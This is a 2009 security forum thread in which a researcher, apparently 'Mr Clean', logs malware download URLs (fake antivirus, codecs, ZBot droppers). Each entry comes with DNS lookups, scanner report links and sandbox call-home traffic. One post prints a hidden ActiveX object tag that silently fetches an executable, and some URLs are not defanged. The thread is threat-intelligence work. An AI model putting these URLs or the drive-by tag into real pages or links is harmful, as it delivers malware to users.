hxxp://piccubes.com.softwarescaninc.com/downloads/slideshows.exe

$ dig piccubes.com.softwarescaninc.com +short
98.126.32.34

http://www.virustotal.com/analisis/a9094f392cc6c104cd1d8099085d088e 10/39
http://anubis.iseclab.org/?action=result&task_id=1e9ce7be7f540b1444177029db10a7cb2&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 05:48:51 pm
Code: [Select]
hxxp://www.gaoqiong.com/js.exe

$ dig www.gaoqiong.com +short
125.46.58.23

http://www.virustotal.com/analisis/035776328497528c46bc51a0be2b29af 8/40
http://anubis.iseclab.org/?action=result&task_id=1d1b10ec3af1d7894dd459b1ba58d47df&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 07:11:18 pm
Code: [Select]
hxxp://uplcodecset3.com/codec/119.exe

$ dig uplcodecset3.com +short
194.165.4.77

http://www.virustotal.com/analisis/a5548a0bfc9a73609f371f47908275bb 16/39
http://anubis.iseclab.org/?action=result&task_id=1f2d731c545b6ef44e55786c574615aaa&format=html

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 29, 2009, 10:18:01 pm
Code: [Select]
hxxp://sp-files.com/download/305a533539773d3dbe4603cd/video.exe

$ dig sp-files.com +short
91.212.65.19

http://www.virustotal.com/analisis/f24f3a6c8775c05ae07ab938f21ff388 7/40
http://anubis.iseclab.org/?action=result&task_id=1c07cd0b741bd782455fdc1976543e134&format=html

Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1032 to 91.212.65.17:80 - [91.212.65.17]
Request: POST /cgi-bin/generator
Response: 200 "OK"

bad neighbourhood
http://www.malwaredomainlist.com/mdl.php?search=91.212.65&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 30, 2009, 07:47:36 pm
Code: [Select]
hxxp://youtubealert.com/setup.exe

$ dig youtubealert.com +short
193.33.61.225

http://www.virustotal.com/analisis/5434b6435428ba5fb55d2e801db764db 15/40

bad neighbourhood
http://www.malwaredomainlist.com/mdl.php?search=193.33.61&colsearch=All&quantity=50

http://anubis.iseclab.org/?action=result&task_id=16dae2409b8729464c57152e725fb0f67&format=html


per anubis, phones home to:

15.6b53ec12a69eae40af18b20d429351ac.m20003.gl22.0.-.261.0.-.0.180853.uroledup.com

IP = 85.12.43.103


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 30, 2009, 08:56:25 pm
Code: [Select]
hxxp://1spywareonlinescanner.com/download/Install_2010-1.exe

$ dig 1spywareonlinescanner.com +short
93.174.93.34
78.47.91.153
38.99.170.209

http://www.virustotal.com/analisis/7a37adaee924f2dff6f4acd2f8a5f5c6 1/40

http://anubis.iseclab.org/?action=result&task_id=1ee3788f547f76ad4ad0abf428d3daca7&format=html

from anubis
Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1033 to 207.46.21.124:80 - [update.microsoft.com]
Request: GET /windowsupdate/v6/thanks.aspx
Response: 200 "OK"
From ANUBIS:1034 to 83.133.123.140:80 - [securedliveuploads.com]
Request: GET /?act=fb&1=0&2=1192706791&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmbpc&4=eebajfjafekaifnbddghoclg&5=20&6=4&7=31&8=95&9=0&10=11-18
Response: 200 "OK"
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 01, 2009, 01:55:48 pm
Code: [Select]
hxxp://1bestprotectionscanner.com/download/Install_2004.exe

$ dig 1bestprotectionscanner.com +short
78.47.91.153
93.174.93.34
38.99.170.209

http://www.virustotal.com/analisis/06f3fc3578f2f178af7434a59344a3a2 4/40
http://anubis.iseclab.org/?action=result&task_id=115ace46280388df415adacefd25b6b4e&format=html


38.99.170.209   Canada  Psinet Inc
http://www.malwaredomainlist.com/mdl.php?search=38.99.170&colsearch=All&quantity=50

78.47.91.153    Germany Siarhei Shandrokha      static.153.91.47.78.clients.your-server.de.     
http://www.malwaredomainlist.com/mdl.php?search=78.47.91&colsearch=All&quantity=50

93.174.93.34    Netherlands     As29073 Ecatel Ltd
http://www.malwaredomainlist.com/mdl.php?search=93.174.93&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 03, 2009, 01:12:03 am
Code: [Select]
hxxp://updateyoursecurity.com/download.php?affid=00000

$ dig updateyoursecurity.com +short
209.44.126.241

http://www.virustotal.com/analisis/f1b29b992c9d6b0d9aae71da5bd788df 12/41

http://anubis.iseclab.org/?action=result&task_id=171ee220f1c7e1274d578e29fffd501c5&format=html

http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 03, 2009, 06:12:23 pm
Code: [Select]
hxxp://1quickpcscanner.com/download/Install_2004.exe

$ dig 1quickpcscanner.com +short
78.47.91.153
94.102.48.28
38.99.170.209

http://www.virustotal.com/analisis/85c5bd1ee852acadf7e9cdf07ccf571a 3/41

http://anubis.iseclab.org/?action=result&task_id=1e53ee6b6dd63b184010d1895dd97bbd2&format=html

38.99.170.209   Canada  Psinet Inc
http://www.malwaredomainlist.com/mdl.php?search=38.99.170&colsearch=All&quantity=50

78.47.91.153    Germany Siarhei Shandrokha      static.153.91.47.78.clients.your-server.de.
http://www.malwaredomainlist.com/mdl.php?search=78.47.91&colsearch=All&quantity=50

94.102.48.28    Netherlands     As29073 Ecatel Ltd
http://www.malwaredomainlist.com/mdl.php?search=94.102.48&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 04, 2009, 02:05:37 pm
Code: [Select]
hxxp://xtube-xmovie.com/promo3/?aid=1361&vname=antivirus

$ dig xtube-xmovie.com +short
78.129.166.166

http://wepawet.iseclab.org/view.php?hash=016fce1f9262311a3bc83f57bdc3f1bb&t=1241445682&type=js
http://www.virustotal.com/analisis/c953a2358db9bd95278405789f0be7cf 13/40

birds of a feather....
http://www.malwaredomainlist.com/mdl.php?search=78.129.166&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 04, 2009, 04:08:54 pm
Code: [Select]
hxxp://socialsecurityscan.com/download.php?affid=17000

$ dig socialsecurityscan.com +short
209.44.126.22

http://wepawet.iseclab.org/view.php?hash=24eaf4de29f605df06fe309e287cfc3e&t=1241453591&type=js
http://www.virustotal.com/analisis/b483e50dfa48b0e6bc26c2c67ed57540 22/40
http://anubis.iseclab.org/?action=result&task_id=1f19550b52e48abc4e9f66202f2c24d81

known bad rep
http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 05, 2009, 12:43:23 pm
Code: [Select]
hxxp://scanner-av-fast.com/11042/3/

$ dig scanner-av-fast.com +short
64.69.32.220

http://wepawet.iseclab.org/view.php?hash=39d61eb8c8986cf16079dbf6a8f0747a&t=1241528023&type=js


Code: [Select]
hxxp://files.load-best-file-arhive.com/normal/setup_11042_3_1.exe

$ dig files.load-best-file-arhive.com +short
load-best-file-arhive.com.
195.88.80.127
$ dig load-best-file-arhive.com +short
195.88.80.127

http://www.virustotal.com/analisis/b3ab977ceb9b48b91664f3e9ea5327f5 6/40
http://anubis.iseclab.org/?action=result&task_id=1a683d6df1cf4fa040da34fa4e3023743


Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1032 to 64.191.64.246:80 - [int.sysproreport1.com]
Request: GET /stat.php?func=installrun&id=11042&landing=-1&lang=EN&sub=1
Response: 200 "OK"
From ANUBIS:1033 to 195.88.81.12:80 - [dl.antispy-scan-4freee.com]
Request: HEAD /get/?pin=0&lnd=0&type=main
Response: 200 "OK"

195.88.80.127   Latvia  Sia Teron
http://www.malwaredomainlist.com/mdl.php?search=195.88.80&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 06, 2009, 12:39:27 am
Code: [Select]
hxxp://www.clunk.biz/screensavers/CoolScreenSaver.exe

$ dig www.clunk.biz +short
clunk.biz.
69.41.243.34
$ dig clunk.biz. +short
69.41.243.34

http://www.virustotal.com/analisis/331729f3740391635d31e77acffa55d5  13/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 06, 2009, 05:13:21 pm
Code: [Select]
hxxp://antivirusbestscannerv1.com/download/Install_2006-40.exe

$ dig antivirusbestscannerv1.com +short
94.102.48.28
78.47.91.153
94.76.212.239
69.4.230.204
212.117.165.126

http://www.virustotal.com/analisis/470fb529226ecfc1efbcd87daf68f6d2 2/40
http://anubis.iseclab.org/?action=result&task_id=1288e8a4c4bb1681425f19f54617f832a&format=html

momentstohaveyou.cn per anubis
Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1034 to 65.55.13.91:80 - [update.microsoft.com]
Request: GET /windowsupdate/v6/thanks.aspx
Response: 200 "OK"
From ANUBIS:1035 to 83.133.123.140:80 - [momentstohaveyou.cn]
Request: GET /?act=fb&1=0&2=1192706791&3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmbpc&4=eebajfjafekaifnbddghoclg&5=20&6=4&7=31&8=95&9=0&10=11-18
Response: 200 "OK"


69.4.230.204   United States   Hosting Services Inc   iad2-virt5.liquidgravity.com.
http://www.malwaredomainlist.com/mdl.php?search=69.4.230&colsearch=All&quantity=50

78.47.91.153   Germany   Siarhei Shandrokha   static.153.91.47.78.clients.your-server.de.
http://www.malwaredomainlist.com/mdl.php?search=78.47.91&colsearch=All&quantity=50

94.76.212.239   United Kingdom   Eukhost Customer Server   94-76-212-239.static.as29550.net.
http://www.malwaredomainlist.com/mdl.php?search=94.76.212&colsearch=All&quantity=50

94.102.48.28   Netherlands   As29073 Ecatel Ltd   
http://www.malwaredomainlist.com/mdl.php?search=94.102.48&colsearch=All&quantity=50

212.117.165.126   Luxembourg   Root Esolutions   ip-212-117-165-126.server.lu.
http://www.malwaredomainlist.com/mdl.php?search=212.117.165&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 07, 2009, 01:57:37 pm
Code: [Select]
hxxp://pyrisiman.com/image/qaze.php

$ dig pyrisiman.com +short
212.95.55.135

http://www.virustotal.com/analisis/d51e723d708ca93455ad7f10bf8cab14 10/42

http://wepawet.iseclab.org/view.php?hash=6f69feb1e6b2bbd01a4967ecaf391115&t=1241704447&type=js

http://anubis.iseclab.org/?action=result&task_id=1f08b0f7365b71b94698e69623203719a&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 11, 2009, 02:14:02 pm
http://ccd.jd2g.com/down/20/fz.txt

u1.ovfr6.com
u2.ovfr6.com
u3.ovfr6.com
u9.ovfr6.com
ccd.jd2g.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 11, 2009, 05:59:10 pm
Code: [Select]
hxxp://adsmaster.org/top/Mzk3MDExNzkyXnc6MjE=

$ dig adsmaster.org +short
74.200.90.72


Code: [Select]
SRC: GET /top/Mzk3MDExNzkyXnc6MjE= HTTP/1.1
SRC: Accept: */*
SRC: UA-CPU: x86
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
SRC: Host: adsmaster.org
SRC: Connection: Keep-Alive
SRC:
SRC:
DST: HTTP/1.1 200 OK
DST: Date: Mon, 11 May 2009 17:03:23 GMT
DST: Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
DST: X-Powered-By: PHP/4.4.9
DST: Cache-Control: no-store, no-cache, must-revalidate
DST: Pragma: no-cache
DST: Accept-Ranges: bytes
DST: Content-Length: 8322
DST: Content-Disposition: inline; filename=setup.exe
DST: Keep-Alive: timeout=2, max=99
DST: Connection: Keep-Alive
DST: Content-Type: application/octet-stream
DST:
DST: MZ......................@...................................|...........!..L.!This program cannot be run in DOS mode.
DST:
DST: $...PE..L...b..I............................y.P......0....@...........................P..........


http://www.virustotal.com/analisis/c263d8ba1a4bad709d2b1e98877f283d 11/40

http://anubis.iseclab.org/?action=result&task_id=1c23a49fc7ea7ae84c5803268c9ddae8f&format=html

Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1033 to 74.200.90.72:80 - [adsmaster.org]
Request: GET /top/mpr/7777.php?w=5
Response: 200 "OK"
Request: GET /top/mpr/7777.php?w=6
Response: 200 "OK"
Request: GET /top/mpr/7777.php?w=7
Response: 200 "OK"
Request: GET /top/mpr/7777.php?w=8
Response: 200 "OK"
From ANUBIS:1036 to 69.65.96.217:80 - [traffbaza.com]
Request: GET /setfile/files/ckMa.jpg
Response: 200 "OK"


Code: [Select]
hxxp://traffbaza.com/setfile/files/ckMa.jpg

$ file ckMa.jpg
ckMa.jpg: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

$ dig traffbaza.com +short
69.65.96.217

http://www.virustotal.com/analisis/8be32db39ce16a0683afde3d35476e6f 23/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 12, 2009, 09:02:02 pm
Code: [Select]
hxxp://eurorem2009.ru/avi.exe

$ dig eurorem2009.ru +short
61.235.117.88

http://www.virustotal.com/analisis/d38acffe6a65f4ea33044506e3f2040f 12/40

http://anubis.iseclab.org/?action=result&task_id=1b07a879cd97ef814a541b8425dd4a2bf&format=html

http://www.malwaredomainlist.com/mdl.php?search=61.235.117&colsearch=All&quantity=50


Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 14, 2009, 12:30:05 pm
Code: [Select]
hxxp://downloadsshare.com/IstallSoftware.exe

$ dig downloadsshare.com +short
118.126.4.86

http://www.virustotal.com/analisis/cc9ae8567d8560630a954a8c20af9054 19/41
http://anubis.iseclab.org/?action=result&task_id=191485f2eefdc8d24b166c7a7ba4d055e&format=html

http://www.malwaredomainlist.com/mdl.php?search=118.126.4&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 14, 2009, 12:34:18 pm
Code: [Select]
hxxp://turuwiando.com/cn.php?yym

$ dig turuwiando.com +short
200.63.45.34


http://wepawet.iseclab.org/view.php?hash=cc4694a68108a7e830048c2bedf58a93&t=1242304488&type=js
http://www.virustotal.com/analisis/725b3a1b963076ce07219bdf4062eab3 10/39
http://anubis.iseclab.org/?action=result&task_id=100a120738fbdabd4055c1f845d339b49&format=html

http://www.malwaredomainlist.com/mdl.php?search=200.63.45&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 18, 2009, 04:01:21 pm
Code: [Select]
192.168.3.3 - - [18/May/2009:15:50:12 +0000] "GET hxxp://countbiz.com/download/6f3949614b673d3dc0e725f1/adobe_flash_player_v10.0.22.87.exe HTTP/1.0" - - "hxxp://jensblog.neverseen.net/player.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"



Code: [Select]
hxxp://countbiz.com/download/6f3949614b673d3dc0e725f1/adobe_flash_player_v10.0.22.87.exe

$ dig countbiz.com +short
91.212.65.19

http://www.virustotal.com/analisis/2db34a7496057715784c4a31826f7e60 7/40

http://www.malwaredomainlist.com/mdl.php?search=91.212.65&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 20, 2009, 12:36:55 pm
Code: [Select]
10.1.0.217 - - [20/May/2009:00:33:21 +0000] "GET http://duplozavr.com/codec/181.exe HTTP/1.1" - - "http://werulezz.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"

$ dig werulezz.com +short
174.36.243.5
$ dig duplozavr.com +short
194.165.4.77

http://www.virustotal.com/analisis/64fd55f12d2d23b7b8e84f33bfa790c8 25/40
http://anubis.iseclab.org/?action=result&task_id=19f9eb0a1e8e06614b1731da93e93c346&format=html


duplozavr.com
werulezz.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 20, 2009, 02:58:39 pm
Code: [Select]
hxxp://bgukeumzwz.net/ak1.exe

$ dig bgukeumzwz.net +short
195.2.253.241

http://www.virustotal.com/analisis/1ca5be9c31c21e96c316fd1fed3050c1 9/40

http://anubis.iseclab.org/?action=result&task_id=1ce99aa259fa4bd34e974c501b7ad52eb&format=html

domain ctfwin.com from anubis analysis

Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1034 to 69.46.25.35:80 - [ctfwin.com]
Request: GET /cd/un1.php?id=1C8B9A6E2FB90CA&ver=d10
Response: 302 "Found"
Request: GET /cd/cd.php?id=1C8B9A6E2FB90CA&ver=d11
Response: 200 "OK"
Request: GET /cd/cd.php?id=1C8B9A6E2FB90CA&ver=d10
Response: 200 "OK"
Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 20, 2009, 09:07:41 pm
Code: [Select]
hxxp://www.sex-like.com/gif.exe

$ dig www.sex-like.com +short
125.46.58.23

http://www.virustotal.com/analisis/064ed991bdd55a356ce81af920f599ad  13/38

http://anubis.iseclab.org/?action=result&task_id=12ddf96468edba4c4edc7b73cdc600b05&format=html

Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 22, 2009, 12:30:00 pm
Code: [Select]
http://worldtube.su/index.php?q=Shawn-Johnson-sextape

$ dig worldtube.su +short
213.182.197.8

http://www.malwaredomainlist.com/mdl.php?search=213.182.197&colsearch=All&quantity=50

the above page has a direct link to this:

Code: [Select]
hxxp://shotgol.com/download/6c72705a4e673d3d68b518b720090516/ActiveXsetup.exe

$ dig shotgol.com +short
91.212.65.19

http://www.virustotal.com/analisis/41284e426c75c6caec8d592d0678750051d68008594f86ec1b02dc010cd8d601-1242993781  14/40
http://anubis.iseclab.org/?action=result&task_id=1787ba9db26851104a5bfdf2280c3e532&format=html
http://www.malwaredomainlist.com/mdl.php?search=91.212.65&colsearch=All&quantity=50



worldtube.su
shotgol.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on May 22, 2009, 10:40:05 pm
Code: [Select]
hxxp://mediapass.trueads.biz/generic/en/access.exe

$ dig mediapass.trueads.biz +short
85.92.152.43

http://www.virustotal.com/analisis/22327a0a8b064be7fb1c472818531a558a52a4aac3d8ad9f362db863beca17bf-1243030064 0/40
http://anubis.iseclab.org/?action=result&task_id=16ae32b3dbad80ff4613a409cfe2552c0&format=html
http://www.threatexpert.com/report.aspx?md5=5e4f487464bea6bc3bf63927342d9d63

http://threatexpert.com/reports.aspx?find=trueads.biz

trueads.biz
Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 02, 2009, 10:27:40 pm
Code: [Select]
hxxp://freesecurityonline.com/download.php?affid=00202 HTTP/1.1


$ dig freesecurityonline.com +short
209.44.126.36

http://wepawet.iseclab.org/view.php?hash=99acfdaeca9700a23960f8ab3f630318&t=1243982479&type=js

http://www.virustotal.com/analisis/054436dce8d78b967bc56f8c1ed3bc19041f36b1ed129e069a7bf9ff843be722-1243981754 6/35

http://anubis.iseclab.org/?action=result&task_id=1d3137c2313497a94492418f42f0eaf1d

http://www.malwaredomainlist.com/mdl.php?search=209.44.126&colsearch=All&quantity=50


freesecurityonline.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 04, 2009, 02:44:04 pm
Code: [Select]
hxxp://check-viruses.com/scan_now.exe

$ dig check-viruses.com +short
67.212.81.29

http://wepawet.iseclab.org/view.php?hash=b3f9781d15b717c9f77ea0420daeecb8&t=1244126963&type=js
http://www.virustotal.com/analisis/cd491729d718b90a2fcdc1ec5a87769bc7210864ae23e35aeff098073c7ce476-1244125982 1/40
http://anubis.iseclab.org/?action=result&task_id=1c4f6a99d3e0c8434cd135c8975d909dc&format=html

check-viruses.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 04, 2009, 05:02:53 pm
Code: [Select]
hxxp://www.tommti-systems.de/main-Dateien/TOOLS/dontlinkthefile_3danalyzer-v236.exe

$ dig www.tommti-systems.de +short
82.165.104.223

http://www.virustotal.com/analisis/eedfb2648b10b943c2c08c64216f8ddf122507c52e068a654dcfb2ba92b3bd51-1244056455 2/40

http://anubis.iseclab.org/?action=result&task_id=1a78d7660ad860ed40d1d67337243014c&format=html

Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 09, 2009, 05:12:15 pm
Code: [Select]
hxxp://evidek.ro/1/pdrv.exe

$ dig evidek.ro +short
86.35.15.212

http://www.virustotal.com/analisis/64d8a55d1473741dfba72090b3048b14ec3285f9c4937b4f1e1110770a59f82b-1244567216 2/39

http://anubis.iseclab.org/?action=result&task_id=1cbaf1fb8ff980d84bd7fe7cc6c449c88&call=first

Code: [Select]
hxxp://evidek.ro/1/pp.10.exe

http://www.virustotal.com/analisis/bb28c24fd8f7e2d4691653b6acdbada71f3f63c9b42a0019748f812dced8af8a-1244567252 25/40

http://anubis.iseclab.org/?action=result&task_id=1684aaa9ec3053434fd5541c7352de0d8


evidek.ro

Title: Re: Mr Clean's dirt
Post by: Mr Clean on June 17, 2009, 03:53:07 pm
Code: [Select]
hxxp://w-crook.com.ar/report_8977.exe

$ dig w-crook.com.ar +short
174.132.180.99


hxxp://scananida.com.pl/report_8977.exe

$ dig scananida.com.pl +short
91.121.8.196

http://www.virustotal.com/analisis/8e6cfb980d4a6a364ce714244f761d2c056c57688908e3d8e263d4fd119043ba-1245252516 2/40

Threat characteristics of ZBot
http://www.threatexpert.com/report.aspx?md5=d4e6069285270e41ef470d897cf26e36

w-crook.com.ar
scananida.com.pl
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 01, 2009, 12:38:38 pm
Code: [Select]
hxxp://www.qiqijs.com/gm/gm.exe

$ dig www.qiqijs.com +short
65.60.6.36

http://www.virustotal.com/analisis/cd1bfd9fdcd2adc67fb6c7d7e8d8f2c552de46f4b021d5b8d24151766f6009e4-1246262154 7/40
http://anubis.iseclab.org/?action=result&task_id=178feb1afefc2c694e1efc6e8f7e71917&format=html
http://www.malwaredomainlist.com/mdl.php?search=65.60.6&colsearch=All&quantity=50


from anubis analysis
Code: [Select]
-  HTTP Conversations: 
From ANUBIS:1035 to 74.222.12.98:80 - [www.edulands.com]
Request: GET /good.gif
Response: 200 "OK"
From ANUBIS:1036 to 63.223.125.17:80 - [www.toptravelsinfo.com]
Request: GET /reg.aspx?query=E4C6D5AAA39AA1A9A7AF9499A0A1A4B1A6ACA8979D716FEDCAE4A2A9A2A79EA2A29FA0747EDCE3D7DDC7DCDEDCE5B5DDCF9D9698
Response: 200 "OK"

resulted in these downloads
Code: [Select]
hxxp://207.159.133.42/images/v2/51.exe
hxxp://207.159.133.42/images/v2/card.exe
hxxp://207.159.133.42/images/v2/ffxi.exe
hxxp://207.159.133.42/images/v2/wow.exe
hxxp://207.159.133.42/images/v2/sk5.exe


qiqijs.com
edulands.com
toptravelsinfo.com




Title: Re: Mr Clean's dirt
Post by: MysteryFCM on July 01, 2009, 01:30:38 pm
207.159.133.42 is imm.cc;

http://www.malwarebytes.org/forums/index.php?showtopic=18421&pid=94505&st=0&#entry94505

http://hosts-file.net/?s=207.159.133.42&view=matches
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 01, 2009, 02:59:17 pm
Code: [Select]
$ curl hxxp://www.betheboss.it/Featured/FCKeditor/editor/edit.txt

hxxp://207.159.133.42/images/v2/51.exe;hxxp://207.159.133.42/images/v2/card.exe;hxxp://207.159.133.42/images/v2/ffxi.exe;hxxp://207.159.133.42/images/v2/wow.exe;hxxp://207.159.133.42/images/v2/sk5.exe;

$ dig www.betheboss.it +short
74.9.2.85


betheboss.it

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 01, 2009, 04:51:42 pm
Code: [Select]
$ curl hxxp://elfah.net/jacon/css/xxcutea.htm

<br>
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<br>
<br>

<object classid="clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365" codebase="hxxp://www.qiqijs.com/gm/gm.exe#version=1,0,0,002"  width="0" height="0">
</object>qiqijs.com
</body>
</html>


elfah.net
qiqijs.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 03, 2009, 11:49:51 am
Code: [Select]
hxxp://26860xfart.cn/Win.exe

$ dig 26860xfart.cn +short
213.182.197.229

http://www.virustotal.com/analisis/c04b3d12befe80368dd5d725582a3bac662666001af7e042b25716ddc6042472-1246621029 2/40
http://anubis.iseclab.org/?action=result&task_id=18690a67c39a37f74f9ff6d8fbdd1604a

http://www.malwaredomainlist.com/mdl.php?search=213.182.197&colsearch=All&quantity=50


http://research.sunbelt-software.com/ViewMalware.aspx?id=9296270&cs=9FBA269829B3E171C7F855BC659E6232



26860xfart.cn
02fgu145501.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 03, 2009, 04:10:44 pm
Code: [Select]
192.168.4.4  - - [ 3/Jul/2009:14:42:43 +0000] "GET http://ncnzfh.info/n.cgi?bdt HTTP/1.1" - - "http://ad.yieldmanager.com/
iframe3?6ycAAIo6CQCuLycAAAAAAF31CgAAAAAAAgAAAAYAAAAAAP8AAAAGC0F0BgAAAAAATlsPAAAAAADZoA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAADvtgIAAAAAAAIAAwAAAAAAZmZmZmZmxj9mZmZmZmbGP2ZmZmZmZsY.ZmZmZmZmxj8AAAAAAADQPwAAAAAAANA.AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAh7V0YP2WBvpQfyTVZ2XdGdsopOYLpW5gsnvqAAAAAA==,,http://ads.specificmedia.com/serve/v=5;m=3;l=3732;c=19459;b=96913;ts=20090703104230;p=ui%3daxpg_lf0ert-na%3btr%3decdchjrzouf%3btm%3d0-0" "Mozilla/4.0 (compatible;MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

192.168.4.4  - - [ 3/Jul/2009:14:42:43 +0000] "GET http://ncnzfh.info/n.cgi?glYySWyWKWKKZKSKKKRYRgllliKeueeYeWiFKYZSeiFSWFZZKWeFeRYlSFSjKKKKKKKKKK HTTP/1.1" - - "http://ncnzfh.info/n.cgi?bdt" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"



Code: [Select]
hxxp://ncnzfh.info/n.cgi?glYySWyWKWKKZKSKKYRYRgllliKeueeYeWiFKYZSeiFSWSKKKWKyKXKKKKKKKKWjK0

$ dig ncnzfh.info +short
216.150.79.74

http://www.virustotal.com/analisis/2ac2a718a8d97706dcfecad4f4e5731fbc109d1cb5d549385593113de55a1a45-1246636591 5/40

http://anubis.iseclab.org/?action=result&task_id=1024cd4a6ef99f034c1562a7f847b884d&format=html
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9298995&cs=FFEFBE23D00087AF7A57D9E89EA1EEFB

ncnzfh.info
specificmedia.com
yieldmanager.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 06, 2009, 04:29:43 pm
Code: [Select]
hxxp://bot.anhheo.com/IEupdate.exe

$ dig bot.anhheo.com +short
174.120.28.58

http://www.virustotal.com/analisis/a5371fbafe46d3efc9a135503d0d2d16f2b04de8069f8dca89f05cfc819a2873-1246897157 5/40


anhheo.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 06, 2009, 04:31:53 pm
Code: [Select]
$ curl hxxp://www3.99yb.com/gygydf.txt
50056.exe
10062.exe
526.exe
504.exe
496.exe
479.exe
529.exe
20021.exe
20023.exe
30021.exe

$ dig www3.99yb.com +short
98.126.41.188

happy digging

99yb.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 07, 2009, 02:51:22 pm
Code: [Select]
hxxp://abjodvsves.com/cgi-bin/index.cgi?lskMOVVZZzZZsZrZZMCOArZEuCZEZZZZZZZZZMVuzzEFMlZZZzZkZlZZZZZZZZzrZ0

$ dig abjodvsves.com +short
208.116.54.18

http://www.virustotal.com/analisis/a6ab535b211c4448ee9885c5e57d9b43edd54f3bb4eb8265e3a20efe75c2fcbb-1246977553 1/40

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9364855&cs=46B6E0D9C9DA79086F1D691FE62BF623

TCP port 443 connects to IP 208.116.54.18

abjodvsves.com
208.116.54.18

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 07, 2009, 02:55:26 pm
Code: [Select]
hxxp://www.google-cdma.com/js.exe

$ dig www.google-cdma.com +short
125.46.58.10

http://www.virustotal.com/analisis/7f3088b0e86840ed9fb1597486297f387a65f75ed17013abf385a1e0dd390f05-1246977655 15/41

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9347478&cs=80EC66388251618BAC43FB0CD3F1CA0F
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 07, 2009, 05:41:50 pm
Code: [Select]
hxxp://weelshow.com/download/5761384b73513d3d5da244ae20090701/Two.Moon.Junction.(1988).exe

$ dig weelshow.com +short
213.163.66.241

http://www.virustotal.com/analisis/488c7f5e217039ed49293a9ce9419057225a182c9c2ee07bf75aee920509a422-1246988599 12/41
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 07, 2009, 08:58:50 pm
Code: [Select]
hxxp://soft-exe.net/Vtask.45089.exe

$ dig soft-exe.net +short
64.20.38.172

http://www.virustotal.com/analisis/6275d2941d090c02ab688fe8800cfa5d74b91a9f62f0a61259c55f7b4b5df15f-1247000409 2/41

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9369838&cs=1ACA9142F82C693A728A663813C77EF7

connect to TCP port 80 on IP 64.27.5.202


